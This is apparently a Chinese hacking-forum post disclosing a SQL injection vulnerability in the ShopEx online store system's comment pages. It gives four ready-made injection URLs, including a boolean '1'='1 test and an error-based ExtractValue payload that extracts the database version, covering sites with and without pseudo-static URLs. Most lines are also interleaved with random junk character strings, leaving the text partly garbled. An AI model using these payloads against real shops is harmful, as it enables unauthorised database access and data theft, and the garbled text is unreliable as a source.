注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…/ u( g0 `0 C, B9 r! z& j$ K+ m8 J
) G& r" W4 O t3 c
好吧,我扯远了~~
1 W( }* ], `# {" I* u其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~. R1 x. x8 H* D3 E3 s& @# I
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:8 @1 e, k9 n+ l# P
, L* L6 x, ^7 T6 }: ?2 F9 r5 \) a
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html6 X/ T" _8 H/ @7 ^. z) e3 T
' F1 g, _8 m5 i+ j& r, S8 d
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
2 C- h" H/ t( M M4 l5 w: R& ^ Q; Y8 S6 l6 O, V8 j
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html' ~. z) g; H7 H, f8 Y- t; }
7 f7 G6 h% T2 C( T9 K1 c
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html3 z. ]4 g/ N. Z# X9 t. L; u$ ~. i
4 \( i$ K6 q1 ]2 o/ r) m
1 V" l! Y; X% D: g$ `* f4 V3 ?: v一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。3 h' w* z* g' q
如何注入就不多说了,10多年的东西了…不会也会了…) G/ [' P( L8 N
8 r& C/ f( N* g% y/ X
|